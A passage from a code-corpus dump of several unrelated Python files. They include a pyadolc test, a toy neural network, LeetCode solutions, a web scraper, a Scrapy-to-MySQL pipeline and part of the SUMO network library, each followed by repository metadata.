        # with g(y) = (y0*y2, y1*y2, y2).
        def gfcn(a):
            print('called gfcn')
            ty = [Tangent(a.xd[0], a.xdd[0]),Tangent(a.xd[1], a.xdd[1]), Tangent(a.xd[2], a.xdd[2])]
            tlhs = [ty[0] * ty[2], ty[1] * ty[2], ty[2]]
            a.lhs[0] = tlhs[0].xdot
            a.lhs[1] = tlhs[1].xdot
            a.lhs[2] = tlhs[2].xdot
        # afcn: the same quantity written out by hand (product rule applied manually).
        def afcn(a):
            a.lhs[0] = a.xd[2] * a.xdd[0] + a.xd[0] * a.xdd[2]
            a.lhs[1] = a.xd[2] * a.xdd[1] + a.xd[1] * a.xdd[2]
            a.lhs[2] = a.xdd[2]
        # Minimal argument container mimicking the PYSOLVIND call interface.
        class Args:
            def __init__(self):
                self.xd = numpy.random.rand(3)
                self.xdd = numpy.random.rand(3)
                self.lhs = numpy.zeros(3)
        args = Args()
        gfcn(args)
        result1 = args.lhs.copy()
        afcn(args)
        result2 = args.lhs.copy()
        # The automatic and the hand-written derivatives must agree on random data.
        assert_array_almost_equal(result1, result2)
# class FunctionExampleTests(TestCase):
# def test_utps_on_jacobian(self):
# def f(x,p):
# print p
# print p[0] + p[1]
# return (p[0] + p[1]) * x**2
# AP = AdolcProgram()
# AP.trace_on(1)
# ax = adouble(3.)
# ap = adouble([5.,7.])
# AP.independent(ax)
# AP.independent(ap)
# tp = [Tangent(ap[0],1),Tangent(ap[1],0)]
# tf = f(ax,tp)
# aJ = tf.xdot
# print aJ
# AP.dependent(aJ)
# AP.trace_off()
# g = gradient(1, [1,2,3])
# print g
if __name__ == '__main__':
    try:
        import nose
    except ImportError:
        # Was a bare `except:` — and nose.runmodule() sat *outside* the try,
        # so a failed import still crashed with NameError right after the hint.
        print('Please install nose for unit testing')
    else:
        nose.runmodule()
|
b45ch1/pyadolc
|
adolc/tests/test_tangent.py
|
test_tangent.py
|
py
| 3,503 |
python
|
en
|
code
| 43 |
github-code
|
6
|
29875084962
|
## ~~~~~~~~~~~~~~~~~~
# Deep Willy Network
## ~~~~~~~~~~~~~~~~~~
import numpy as np, json, sys, os
sys.path.append(os.path.dirname(__file__))
from willies import *
class DeepWilly(object):
    """Sequential network of 'willy' layers trained with mini-batch SGD.

    Layers come from the ``willies`` module.  The first layer added must
    already know its input shape; each subsequent layer is wired to the
    previous layer's output shape.
    """

    # File label -> layer class, used by load() to rebuild saved layers.
    _willy_classes = {'connected': ConnectedWilly,
                      'dropout': DropoutWilly,
                      'convolutional': ConvolutionalWilly,
                      'pooling': PoolingWilly,
                      'stacking': StackingWilly}

    def __init__(self, cost_func='cross entropy'):
        """Set up an empty network with the chosen cost ('cross entropy' or 'quadratic')."""
        self.willies = []
        self.n_willies = 0
        self.cost_func = cost_func
        if cost_func == 'cross entropy':
            # The (a == 0)/(a == 1) terms and the 1e-99 keep log() and the
            # division finite when activations saturate at exactly 0 or 1.
            self.cost = lambda a, y: -np.mean(y * np.log(a + (a == 0)) + (1-y) * np.log(1-a + (a == 1)))
            self.dcost = lambda a, y: (1/a.shape[0]) * (a - y) / (a * (1 - a) + 1e-99)
        elif cost_func == 'quadratic':
            self.cost = lambda a, y: 0.5 * np.mean((a - y)**2)
            self.dcost = lambda a, y: (1/a.shape[0]) * (a - y)
        else:
            raise Exception('Unsupported cost function: ' + cost_func)

    def add(self, willy):
        """Append *willy*, wiring its input to the previous layer's output shape."""
        if len(self.willies) == 0:
            if not willy.is_set_up:
                raise Exception('Input shape or number must be provided to first Willy.')
        else:
            willy.set_up(self.willies[-1].out_shape)
        self.willies.append(willy)
        self.n_willies += 1

    def forward_prop(self, X):
        """Propagate X through every layer and return the final activations."""
        for willy in self.willies:
            X = willy.forward_prop(X)
        return X

    def backward_prop(self, X, y, learn_rate, mom_rate, reg_rate):
        """Backpropagate errors while updating each layer's weights in place."""
        # dC/da at the output layer.
        dA = self.dcost(self.willies[-1].A, y)
        # Input seen by each layer, ordered last-to-first: the previous
        # layer's activations (or X itself for the first layer).
        XA = ([X] + [willy.A for willy in self.willies[:-1]])[::-1]
        for w, willy in enumerate(reversed(self.willies)):
            willy.update_weights(dA, XA[w], learn_rate, mom_rate, reg_rate)
            dA = willy.backward_prop()

    @staticmethod
    def get_batches(X, y, batch_size):
        """Shuffle (X, y) jointly and split into batches of *batch_size*.

        batch_size == -1 (or >= len(X)) means one full-data batch.
        """
        if batch_size == -1 or batch_size >= X.shape[0]:
            return [X], [y]
        shuffled_indices = np.random.permutation(len(X))
        shuffled_X = X[shuffled_indices]
        shuffled_y = y[shuffled_indices]
        X_batches, y_batches = [], []
        for i in range(X.shape[0] // batch_size):
            lo, hi = int(batch_size * i), int(batch_size * (i + 1))
            X_batches.append(shuffled_X[lo:hi])
            y_batches.append(shuffled_y[lo:hi])
        return X_batches, y_batches

    def train(self, X, y, num_iterations, batch_size,
              learn_rate, reg_rate, mom_rate=0, verbose=False):
        """Run *num_iterations* epochs of mini-batch gradient descent.

        *verbose* (falsy or int): print the last batch's cost every
        *verbose* iterations.
        """
        X = X.astype(np.float32)
        y = y.astype(np.float32)
        # Start every training run with zeroed momenta.
        for willy in self.willies:
            willy.reset_momenta()
        for iteration in range(num_iterations):
            X_batches, y_batches = self.get_batches(X, y, batch_size)
            for batchX, batchy in zip(X_batches, y_batches):
                self.forward_prop(batchX)
                self.backward_prop(batchX, batchy, learn_rate, mom_rate, reg_rate)
            if verbose and iteration % verbose == 0:
                print("Training cost on last batch: ", self.cost(self.willies[-1].A, batchy))

    def predict(self, X, pred_type='as is'):
        """Forward-propagate X; pred_type: 'as is', 'binary' (>0.5) or 'argmax'."""
        self.yhat = self.forward_prop(X)
        if pred_type == 'binary':
            self.yhat = 1 * (self.yhat > 0.5)
        elif pred_type == 'argmax':
            self.yhat = np.argmax(self.yhat, axis=1).reshape(-1, 1)
        else:
            assert pred_type == 'as is', \
                "Provided argument pred_type (" + pred_type + ") not supported."
        return self.yhat

    def accuracy(self, X, y, pred_type='as is'):
        """Return the fraction of predictions equal to y."""
        return np.mean(self.predict(X, pred_type) == y)

    def save(self, filename):
        """Serialise the network (cost function name + every layer) to JSON."""
        willy_data = [willy.save() for willy in self.willies]
        data = {'cost': self.cost_func, 'willies': willy_data}
        with open(filename, "w") as file:
            json.dump(data, file)

    @classmethod
    def load(cls, filename):
        """Rebuild a network previously written by :meth:`save`."""
        with open(filename, "r") as file:
            data = json.load(file)
        # Bug fix: save() stores the cost function under the key 'cost';
        # this method previously read data['cost_func'] and raised KeyError.
        deep_willy = cls(data['cost'])
        for willy in data['willies']:
            willy_class = DeepWilly._willy_classes[willy['willy']]
            deep_willy.add(willy_class.load(willy))
        return deep_willy

    def copy(self):
        """Return a new DeepWilly whose layers are copies of this one's."""
        duplicate = DeepWilly(cost_func=self.cost_func)
        for willy in self.willies:
            duplicate.willies.append(willy.copy())
            duplicate.n_willies += 1
        return duplicate
|
gavarela/willyai
|
willyai/deepWilly.py
|
deepWilly.py
|
py
| 6,171 |
python
|
en
|
code
| 0 |
github-code
|
6
|
50051591
|
from typing import *
# A longer string can never be a subsequence of a shorter one, so sort the
# strings from longest to shortest and check whether each one is a subsequence
# of any other string at least as long as itself.
# When we add a letter Y to our candidate longest uncommon subsequence answer of X, it only makes it strictly harder to find a common subsequence.
# Thus our candidate longest uncommon subsequences will be chosen from the group of words itself.
class Solution:
    def findLUSlength(self, strs: List[str]) -> int:
        """Length of the longest string that is not a subsequence of any other, or -1."""
        def is_subseq(cand, other):
            # Greedy scan: `ch in it` consumes the iterator up to the first match,
            # so all() succeeds iff cand appears in order inside other.
            it = iter(other)
            return all(ch in it for ch in cand)

        # Longest-first: the first candidate that is uncommon wins.
        strs.sort(key=len, reverse=True)
        for idx, cand in enumerate(strs):
            others = (other for j, other in enumerate(strs) if j != idx)
            if not any(is_subseq(cand, other) for other in others):
                return len(cand)
        return -1
if __name__ == "__main__":
    # Smoke tests from the problem statement.
    s = Solution()
    assert s.findLUSlength(["aba","cdc","eae"]) == 3
    assert s.findLUSlength(["aaa","aaa","aa"]) == -1
|
code-cp/leetcode
|
solutions/522/main.py
|
main.py
|
py
| 1,198 |
python
|
en
|
code
| 0 |
github-code
|
6
|
44632376656
|
# coding:utf-8
from bs4 import BeautifulSoup
import urllib.request as req
import sqlite3
from contextlib import closing
# Page to scrape and SQLite target; NOTE: the connection is opened at import
# time and only closed in the __main__ block below.
url="http://su-gi-rx.com/2017/07/16/python_4/"
dbname='database.db'
conn=sqlite3.connect(dbname)
c=conn.cursor()
table_name = 'test'
def get_html():
    """Fetch the target page and return [(title, paragraphs)] for DB insertion."""
    # Fetch the page with urlopen()
    res=req.urlopen(url)
    # Parse it with BeautifulSoup()
    soup=BeautifulSoup(res,'html.parser')
    # Extract the pieces we want
    title1=soup.find("h1").string
    #print("title=",title1)
    p_list=soup.find_all("p")
    #print("text=",p_list)
    return [(str(title1),str(p_list))]
def create_table(tname):
    """Create table *tname* (title, p_list) if it does not already exist."""
    # Execute the SQL statement with the execute method.
    # NOTE(review): tname is interpolated into the SQL string — only safe for
    # trusted, internal table names.
    create_table='''create table if NOT EXISTS {0} (title varchar(64),p_list varchar(32))'''.format(tname)
    c.execute(create_table)
def insert_data(tname, data):
    """Insert the given (title, p_list) row sequence into table *tname*.

    Bug fix: the original executed with the module-level global ``test``
    instead of the ``data`` parameter, so the function only worked when
    called from this script's __main__ block.
    """
    insert_sql = 'insert into {0} (title,p_list) values(?,?)'.format(tname)
    c.executemany(insert_sql, data)
    conn.commit()
if __name__=='__main__':
    create_table(table_name)
    test=get_html()
    insert_data(table_name,test)
    # Echo everything stored so far, then release the connection.
    select_sql = 'select * from {0}'.format(table_name)
    for row in c.execute(select_sql):
        print(row)
    conn.close()
|
riku-nagisa/python1
|
html_ren.py
|
html_ren.py
|
py
| 1,261 |
python
|
en
|
code
| 0 |
github-code
|
6
|
34183765672
|
def convert_rank(num):
    """Translate a winning-number count into a lottery rank (1 best, 6 worst)."""
    # 6 hits -> rank 1, 5 -> 2, ..., 2 -> 5; both 0 and 1 hits map to rank 6.
    return min(7 - num, 6)


def solution(lottos, win_nums):
    """Return [best, worst] achievable ranks for a ticket with obscured (0) numbers."""
    zeros = 0
    hits = 0
    for number in lottos:
        if number == 0:
            zeros += 1
        if number in win_nums:
            hits += 1
    # Best case: every obscured number is a winner; worst case: none are.
    return [convert_rank(hits + zeros), convert_rank(hits)]
# Sample cases from the problem statement; expected output: [3, 5], [1, 6], [1, 1].
test_case = [
    [[44, 1, 0, 0, 31, 25], [31, 10, 45, 1, 6, 19]],
    [[0, 0, 0, 0, 0, 0], [38, 19, 20, 40, 15, 25]],
    [[45, 4, 35, 20, 3, 9], [20, 9, 3, 45, 4, 35]]
]
for lottos, win_nums in test_case:
    print(solution(lottos, win_nums))
|
study-for-interview/algorithm-study
|
hanjo/개인용/programmers/완전탐색/L1_로또의최고순위와최저순위/solution.py
|
solution.py
|
py
| 578 |
python
|
en
|
code
| 8 |
github-code
|
6
|
25018521367
|
# Two-level model configuration: settings shared by every model vs. per-model.
model_cfg = {
    "high_level_parameters": { # parameters common to all models, e.g. how much data to get, debugging parameters etc.
        "data_period": ("2020-01-01", "2023-01-01"),
        "parameter2": 60,
        "parameter3": 20,
    },
    "low_level_parameters": {
        # Settings specific to each individual model.
        "model1_parameters": {
            "learning_rate": 1,
            "hidden_layers": 2,
        },
        "model2_parameters": {
            "ewma_alpha": 0.05,
            "sigma": 3,
        },
    },
}
|
hviidhenrik/my-sample-data-science-structure
|
core/config/model_config.py
|
model_config.py
|
py
| 488 |
python
|
en
|
code
| 0 |
github-code
|
6
|
73995685309
|
# from game import random
# from game import np
from game import Game
from agent import Agent
import pandas as pd
class GameAnalysis:
    """Read-only reporting helpers over a finished Game, as pandas DataFrames."""

    def __init__(self, imported_game: "Game"):
        # Annotation is quoted so this module imports without the game module.
        self.game = imported_game

    def print_data(self):
        """One row per robot: its name and how much food it found."""
        rows = [[rob.name, rob.logs["food_found"]] for rob in self.game.robots]
        return pd.DataFrame(rows, columns=["name", "food found"]).set_index(["name"])

    @staticmethod
    def vocab_to_df(rob: "Agent"):
        """Flatten rob.vocab {input: {action: (features, (inertia, mistakes))}}
        into a DataFrame indexed by '<name>_input'."""
        columns = [f"{rob.name}_input", f"{rob.name}_action", f"{rob.name}_features",
                   f"{rob.name}_inertia", f"{rob.name}_mistakes"]
        rows = []
        for word, actions in rob.vocab.items():
            for action, action_data in actions.items():
                rows.append([str(word), str(action), str(action_data[0]),
                             action_data[1][0], action_data[1][1]])
        return pd.DataFrame(rows, columns=columns).set_index([f"{rob.name}_input"])

    def print_vocabs(self):
        """Outer-join every robot's vocabulary table on the input index.

        Returns None when the game has no robots (the original version
        probed ``"merged_df" not in locals()`` and raised NameError then).
        """
        merged = None
        for rob in self.game.robots:
            df = self.vocab_to_df(rob)
            merged = df if merged is None else merged.join(df, how="outer")
        return merged

    def print_vocab_chain(self, requester: "Agent", fetcher: "Agent"):
        """Join requester actions onto fetcher inputs.

        Generalised from the original hard-coded "A_action"/"B_input" column
        names: the join columns are derived from the robots' actual names,
        which is identical behaviour when they are called "A" and "B".
        """
        dfr = self.vocab_to_df(requester).reset_index()
        dff = self.vocab_to_df(fetcher).reset_index()
        return pd.merge(dfr, dff, left_on=f"{requester.name}_action",
                        right_on=f"{fetcher.name}_input", how="outer")

    def show_instructions(self):
        """Return the given_sentences log of the first fetcher robot, if any."""
        for rob in self.game.robots:
            if rob.role == "fetcher":
                return pd.DataFrame(rob.logs["given_sentences"])
|
Jayordo/thymio_aseba_install
|
lang_game_2/game_analysis.py
|
game_analysis.py
|
py
| 3,884 |
python
|
en
|
code
| 0 |
github-code
|
6
|
6771398570
|
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
import pymysql
class ProxyPoolCrawlerPipeline(object):
    """Default pass-through pipeline: items continue to the next stage unchanged."""

    def process_item(self, item, spider):
        # No transformation performed here.
        return item
# Store items into the MySQL database
class ProxyPoolCrawler2mysql(object):
    """Persist each scraped proxy address into the local `proxypool.proxy` table."""

    def process_item(self, item, spider):
        """Insert item['address'] and return the item for the next pipeline stage."""
        address = item['address']
        # NOTE(review): opening a fresh connection per item is simple but slow;
        # consider connecting in open_spider() and closing in close_spider().
        connection = pymysql.connect(
            host='localhost',   # local database server
            user='root',        # MySQL user name
            passwd='',          # MySQL password
            db='proxypool',     # database name
            charset='utf8mb4',  # default encoding
            cursorclass=pymysql.cursors.DictCursor)
        try:
            with connection.cursor() as cursor:
                sql = """INSERT INTO proxy(address)
                VALUES (%s)"""
                # Parameters must be a sequence: `(address)` was just a
                # parenthesised string; `(address,)` is a one-element tuple.
                cursor.execute(sql, (address,))
                # Commit this insert.
                connection.commit()
        finally:
            # Always release the connection.
            connection.close()
        return item
|
ShawnRong/proxy-pool-crawler
|
proxy_pool_crawler/pipelines.py
|
pipelines.py
|
py
| 2,136 |
python
|
en
|
code
| 0 |
github-code
|
6
|
2721248561
|
import copy, random, datetime
# Mock supplies data: one template of three categories (food, drink, medicine),
# each holding 42 days of labels/values, cloned into nine identical datasets.
suppliesDataSets = [
    [
        {
            "labels": [], #food
            "data": []
        },
        {
            "labels": [], #drink
            "data": []
        },
        {
            "labels": [], #medicine
            "data": []
        }
    ]
]
now = datetime.datetime.now()
# Fill each category with the last 42 days (newest first) and random counts.
for i in range(3):
    for j in range(42):
        t_ = (now + datetime.timedelta(days=-j)).strftime('%Y-%m-%d')
        suppliesDataSets[0][i]["labels"].append(t_)
        k = random.randint(0, 200)
        suppliesDataSets[0][i]["data"].append(k)
# Deep-copy the template eight more times so each clone is independent.
for i in range(8):
    cloned_ = copy.deepcopy(suppliesDataSets[0])
    suppliesDataSets.append(cloned_)
|
e1833-tomohiro/Kadai
|
backend/store.py
|
store.py
|
py
| 680 |
python
|
en
|
code
| 0 |
github-code
|
6
|
8384623961
|
from __future__ import print_function
from __future__ import absolute_import
import sys
import math
import heapq
import gzip
import warnings
from xml.sax import handler, parse
from copy import copy
from collections import defaultdict
from itertools import chain
import sumolib
from . import lane, edge, netshiftadaptor, node, connection, roundabout # noqa
from .connection import Connection
class TLS:
    """A traffic light signal (junction controller) in a SUMO network."""

    def __init__(self, id):
        # Connections are [inLane, outLane, linkIndex] triples in insertion order.
        self._id = id
        self._connections = []
        self._maxConnectionNo = -1
        self._programs = {}

    def addConnection(self, inLane, outLane, linkNo):
        """Register a controlled connection and track the highest link index."""
        self._connections.append([inLane, outLane, linkNo])
        self._maxConnectionNo = max(self._maxConnectionNo, linkNo)

    def getConnections(self):
        return self._connections

    def getID(self):
        return self._id

    def getLinks(self):
        """Group the connections by their link index."""
        links = {}
        for conn in self._connections:
            links.setdefault(conn[2], []).append(conn)
        return links

    def getEdges(self):
        """Return the set of edges whose lanes feed into this signal."""
        return {conn[0].getEdge() for conn in self._connections}

    def addProgram(self, program):
        self._programs[program._id] = program

    def removePrograms(self):
        self._programs.clear()

    def toXML(self):
        """Concatenate the XML of every attached program."""
        return "".join(prog.toXML(self._id) for prog in self._programs.values())

    def getPrograms(self):
        return self._programs
class Phase:
    """One signal phase: a state string shown for *duration* seconds."""

    def __init__(self, duration, state, minDur=-1, maxDur=-1, next=None, name=""):
        self.duration = duration
        self.state = state
        self.minDur = minDur  # minimum duration (only for actuated tls)
        self.maxDur = maxDur  # maximum duration (only for actuated tls)
        # Guard against the shared-mutable-default pitfall: each phase
        # gets its own list.
        self.next = [] if next is None else next
        self.name = name

    def __repr__(self):
        name = "" if self.name == "" else ", name='%s'" % self.name
        next = "" if len(self.next) == 0 else ", next='%s'" % self.next
        # Bug fix: the original format string was missing the closing ')'.
        return ("Phase(duration=%s, state='%s', minDur=%s, maxDur=%s%s%s)" %
                (self.duration, self.state, self.minDur, self.maxDur, name, next))
class TLSProgram:
    """A signal program: an ordered list of phases plus key/value parameters."""

    def __init__(self, id, offset, type):
        self._id = id
        self._type = type
        self._offset = offset
        self._phases = []
        self._params = {}

    def addPhase(self, state, duration, minDur=-1, maxDur=-1, next=None, name=""):
        """Append a new Phase built from the given attributes."""
        self._phases.append(Phase(duration, state, minDur, maxDur, next, name))

    def toXML(self, tlsID):
        """Serialise this program as a <tlLogic> element belonging to *tlsID*."""
        parts = [' <tlLogic id="%s" type="%s" programID="%s" offset="%s">\n' % (
            tlsID, self._type, self._id, self._offset)]
        for phase in self._phases:
            # Optional attributes are emitted only when they carry information.
            minDur = '' if phase.minDur < 0 else ' minDur="%s"' % phase.minDur
            maxDur = '' if phase.maxDur < 0 else ' maxDur="%s"' % phase.maxDur
            name = '' if phase.name == '' else ' name="%s"' % phase.name
            nxt = '' if len(phase.next) == 0 else ' next="%s"' % ' '.join(map(str, phase.next))
            parts.append(' <phase duration="%s" state="%s"%s%s%s%s/>\n' % (
                phase.duration, phase.state, minDur, maxDur, name, nxt))
        parts.extend(' <param key="%s" value="%s"/>\n' % (k, v)
                     for k, v in self._params.items())
        parts.append(' </tlLogic>\n')
        return "".join(parts)

    def getPhases(self):
        return self._phases

    def getType(self):
        return self._type

    def setParam(self, key, value):
        self._params[key] = value

    def getParam(self, key, default=None):
        return self._params.get(key, default)

    def getParams(self):
        return self._params
class Net:
"""The whole sumo network."""
def __init__(self):
self._location = {}
self._id2node = {}
self._id2edge = {}
self._crossings_and_walkingAreas = set()
self._macroConnectors = set()
self._id2tls = {}
self._nodes = []
self._edges = []
self._tlss = []
self._ranges = [[10000, -10000], [10000, -10000]]
self._roundabouts = []
self._rtreeEdges = None
self._rtreeLanes = None
self._allLanes = []
self._origIdx = None
self._proj = None
self.hasInternal = False
# store dijsktra heap for reuse if the same origin is used repeatedly
self._shortestPathCache = None
def setLocation(self, netOffset, convBoundary, origBoundary, projParameter):
self._location["netOffset"] = netOffset
self._location["convBoundary"] = convBoundary
self._location["origBoundary"] = origBoundary
self._location["projParameter"] = projParameter
def addNode(self, id, type=None, coord=None, incLanes=None, intLanes=None):
if id is None:
return None
if id not in self._id2node:
n = node.Node(id, type, coord, incLanes, intLanes)
self._nodes.append(n)
self._id2node[id] = n
self.setAdditionalNodeInfo(
self._id2node[id], type, coord, incLanes, intLanes)
return self._id2node[id]
def setAdditionalNodeInfo(self, node, type, coord, incLanes, intLanes=None):
if coord is not None and node._coord is None:
node._coord = coord
self._ranges[0][0] = min(self._ranges[0][0], coord[0])
self._ranges[0][1] = max(self._ranges[0][1], coord[0])
self._ranges[1][0] = min(self._ranges[1][0], coord[1])
self._ranges[1][1] = max(self._ranges[1][1], coord[1])
if incLanes is not None and node._incLanes is None:
node._incLanes = incLanes
if intLanes is not None and node._intLanes is None:
node._intLanes = intLanes
if type is not None and node._type is None:
node._type = type
def addEdge(self, id, fromID, toID, prio, function, name, edgeType=''):
if id not in self._id2edge:
fromN = self.addNode(fromID)
toN = self.addNode(toID)
e = edge.Edge(id, fromN, toN, prio, function, name, edgeType)
self._edges.append(e)
self._id2edge[id] = e
if function:
self.hasInternal = True
return self._id2edge[id]
def addLane(self, edge, speed, length, width, allow=None, disallow=None):
return lane.Lane(edge, speed, length, width, allow, disallow)
def addRoundabout(self, nodes, edges=None):
r = roundabout.Roundabout(nodes, edges)
self._roundabouts.append(r)
return r
    def addConnection(self, fromEdge, toEdge, fromlane, tolane, direction, tls, tllink, state, viaLaneID=None):
        """Create a connection between two lanes, register it on the
        participating edges/lanes and return it."""
        conn = connection.Connection(
            fromEdge, toEdge, fromlane, tolane, direction, tls, tllink, state, viaLaneID)
        fromEdge.addOutgoing(conn)
        fromlane.addOutgoing(conn)
        toEdge._addIncoming(conn)
        if viaLaneID:
            try:
                # internal lanes are only available when building with option withInternal=True
                viaLane = self.getLane(viaLaneID)
                viaEdge = viaLane.getEdge()
                # also register an incoming connection on the internal (via) edge
                viaEdge._addIncoming(connection.Connection(
                    fromEdge, viaEdge, fromlane, viaLane, direction, tls,
                    tllink, state, ''))
            except Exception:
                # deliberate best effort: skip silently when the via lane is unknown
                pass
        return conn
def getEdges(self, withInternal=True):
if not withInternal:
return [e for e in self._edges if e.getFunction() == '']
else:
return self._edges
    def getRoundabouts(self):
        """Return the list of roundabouts in the network."""
        return self._roundabouts
    def hasEdge(self, id):
        """Return whether an edge with the given id is known."""
        return id in self._id2edge
    def getEdge(self, id):
        """Return the edge with the given id (raises KeyError when unknown)."""
        return self._id2edge[id]
def getLane(self, laneID):
edge_id, lane_index = laneID.rsplit("_", 1)
return self.getEdge(edge_id).getLane(int(lane_index))
    def _initRTree(self, shapeList, includeJunctions=True):
        """Build an rtree spatial index over the bounding boxes of *shapeList*.

        Raises ImportError when the optional 'rtree' module is missing;
        callers use that to fall back to a brute-force scan.
        """
        import rtree  # noqa
        result = rtree.index.Index()
        result.interleaved = True
        for ri, shape in enumerate(shapeList):
            result.add(ri, shape.getBoundingBox(includeJunctions))
        return result
    # Please be aware that the resulting list of edges is NOT sorted
    def getNeighboringEdges(self, x, y, r=0.1, includeJunctions=True, allowFallback=True):
        """Return [(edge, distance), ...] for all edges within *r* of (x, y).

        Uses an rtree spatial index when the 'rtree' module is available;
        otherwise falls back to scanning all edges (or re-raises the
        ImportError when allowFallback is False).
        """
        edges = []
        try:
            if self._rtreeEdges is None:
                self._rtreeEdges = self._initRTree(self._edges, includeJunctions)
            for i in self._rtreeEdges.intersection((x - r, y - r, x + r, y + r)):
                e = self._edges[i]
                d = sumolib.geomhelper.distancePointToPolygon(
                    (x, y), e.getShape(includeJunctions))
                if d < r:
                    edges.append((e, d))
        except ImportError:
            if not allowFallback:
                raise
            warnings.warn("Module 'rtree' not available. Using brute-force fallback.")
            for the_edge in self._edges:
                d = sumolib.geomhelper.distancePointToPolygon((x, y), the_edge.getShape(includeJunctions))
                if d < r:
                    edges.append((the_edge, d))
        return edges
    def getNeighboringLanes(self, x, y, r=0.1, includeJunctions=True, allowFallback=True):
        """Return [(lane, distance), ...] for all lanes within *r* of (x, y).

        Analogous to getNeighboringEdges, with the same rtree / brute-force
        fallback behaviour.
        """
        lanes = []
        try:
            if self._rtreeLanes is None:
                # NOTE(review): if _initRTree raises ImportError here,
                # _allLanes has already been filled and is extended again on
                # the next call; harmless while the rtree path stays unused,
                # but worth confirming.
                for the_edge in self._edges:
                    self._allLanes += the_edge.getLanes()
                self._rtreeLanes = self._initRTree(self._allLanes, includeJunctions)
            for i in self._rtreeLanes.intersection((x - r, y - r, x + r, y + r)):
                the_lane = self._allLanes[i]
                d = sumolib.geomhelper.distancePointToPolygon((x, y), the_lane.getShape(includeJunctions))
                if d < r:
                    lanes.append((the_lane, d))
        except ImportError:
            if not allowFallback:
                raise
            warnings.warn("Module 'rtree' not available. Using brute-force fallback.")
            for the_edge in self._edges:
                for the_lane in the_edge.getLanes():
                    d = sumolib.geomhelper.distancePointToPolygon((x, y), the_lane.getShape(includeJunctions))
                    if d < r:
                        lanes.append((the_lane, d))
        return lanes
    def hasNode(self, id):
        """Return whether a node with the given id is known."""
        return id in self._id2node
    def getNode(self, id):
        """Return the node with the given id (raises KeyError when unknown)."""
        return self._id2node[id]
    def getNodes(self):
        """Return the list of all nodes."""
        return self._nodes
    def getTLS(self, tlid):
        """Return the traffic light with the given id (raises KeyError when unknown)."""
        return self._id2tls[tlid]
def getTLSSecure(self, tlid):
if tlid in self._id2tls:
tls = self._id2tls[tlid]
else:
tls = TLS(tlid)
self._id2tls[tlid] = tls
self._tlss.append(tls)
return tls
    def getTrafficLights(self):
        """Return the list of all traffic lights."""
        return self._tlss
    def addTLS(self, tlid, inLane, outLane, linkNo):
        """Register a controlled connection on the given traffic light and
        return the TLS object (created on demand)."""
        tls = self.getTLSSecure(tlid)
        tls.addConnection(inLane, outLane, linkNo)
        return tls
    def addTLSProgram(self, tlid, programID, offset, type, removeOthers):
        """Create a TLSProgram, attach it to the given traffic light and
        return it; optionally drop all previously attached programs."""
        tls = self.getTLSSecure(tlid)
        program = TLSProgram(programID, offset, type)
        if removeOthers:
            tls.removePrograms()
        tls.addProgram(program)
        return program
    def setFoes(self, junctionID, index, foes, prohibits):
        """Forward right-of-way (foes/prohibits) data to the given junction."""
        self._id2node[junctionID].setFoes(index, foes, prohibits)
    def forbids(self, possProhibitor, possProhibited):
        """Return whether *possProhibitor* has priority over *possProhibited*
        at the junction they share."""
        return possProhibitor.getFrom().getToNode().forbids(possProhibitor, possProhibited)
    def getDownstreamEdges(self, edge, distance, stopOnTLS, stopOnTurnaround):
        """return a list of lists of the form
        [[firstEdge, pos, [edge_0, edge_1, ..., edge_k], aborted], ...]
        where
        firstEdge: is the downstream edge furthest away from the intersection,
        [edge_0, ..., edge_k]: is the list of edges from the intersection downstream to firstEdge
        pos: is the position on firstEdge with distance to the end of the input edge
        aborted: a flag indicating whether the downstream
        search stopped at a TLS or a node without incoming edges before reaching the distance threshold
        """
        # NOTE(review): the traversal expands via the edges' _incoming dicts —
        # confirm this matches the "downstream" wording of the docstring.
        ret = []
        seen = set()
        toProc = []
        # work items: [edge, accumulated distance, path so far]
        toProc.append([edge, 0, []])
        while not len(toProc) == 0:
            ie = toProc.pop()
            if ie[0] in seen:
                continue
            seen.add(ie[0])
            # search radius reached on this edge: record result, stop branch
            if ie[1] + ie[0].getLength() >= distance:
                ret.append(
                    [ie[0], ie[0].getLength() + ie[1] - distance, ie[2], False])
                continue
            # dead end: no incoming edges -> aborted result
            if len(ie[0]._incoming) == 0:
                ret.append([ie[0], ie[0].getLength() + ie[1], ie[2], True])
                continue
            mn = []
            stop = False
            for ci in ie[0]._incoming:
                if ci not in seen:
                    prev = copy(ie[2])
                    if stopOnTLS and ci._tls and ci != edge and not stop:
                        ret.append([ie[0], ie[1], prev, True])
                        stop = True
                    elif (stopOnTurnaround and ie[0]._incoming[ci][0].getDirection() == Connection.LINKDIR_TURN and
                            not stop):
                        ret.append([ie[0], ie[1], prev, True])
                        stop = True
                    else:
                        prev.append(ie[0])
                        mn.append([ci, ie[0].getLength() + ie[1], prev])
            if not stop:
                toProc.extend(mn)
        return ret
    def getEdgesByOrigID(self, origID):
        """Return the set of edges whose lanes carry the given "origId" param.

        The reverse index is built lazily on the first call.
        """
        if self._origIdx is None:
            self._origIdx = defaultdict(set)
            for the_edge in self._edges:
                for the_lane in the_edge.getLanes():
                    for oID in the_lane.getParam("origId", "").split():
                        self._origIdx[oID].add(the_edge)
        return self._origIdx[origID]
def getBBoxXY(self):
"""
Get the bounding box (bottom left and top right coordinates) for a net;
Coordinates are in X and Y (not Lat and Lon)
:return [(bottom_left_X, bottom_left_Y), (top_right_X, top_right_Y)]
"""
return [(self._ranges[0][0], self._ranges[1][0]),
(self._ranges[0][1], self._ranges[1][1])]
# the diagonal of the bounding box of all nodes
def getBBoxDiameter(self):
return math.sqrt(
(self._ranges[0][0] - self._ranges[0][1]) ** 2 +
(self._ranges[1][0] - self._ranges[1][1]) ** 2)
def getGeoProj(self):
if self._proj is None:
import pyproj
try:
self._proj = pyproj.Proj(projparams=self._location["projParameter"])
except RuntimeError:
if hasattr(pyproj.datadir, 'set_data_dir'):
pyproj.datadir.set_data_dir('/usr/share/proj')
self._proj = pyproj.Proj(projparams=self._location["projParameter"])
raise
return self._proj
def getLocationOffset(self):
""" offset to be added after converting from geo-coordinates to UTM"""
return list(map(float, self._location["netOffset"].split(",")))
def getBoundary(self):
""" return xmin,ymin,xmax,ymax network coordinates"""
return list(map(float, self._location["convBoundary"].split(",")))
def convertLonLat2XY(self, lon, lat, rawUTM=False):
x, y = self.getGeoProj()(lon, lat)
if rawUTM:
return x, y
else:
x_off, y_off = self.getLocationOffset()
return x + x_off, y + y_off
def convertXY2LonLat(self, x, y, rawUTM=False):
if not rawUTM:
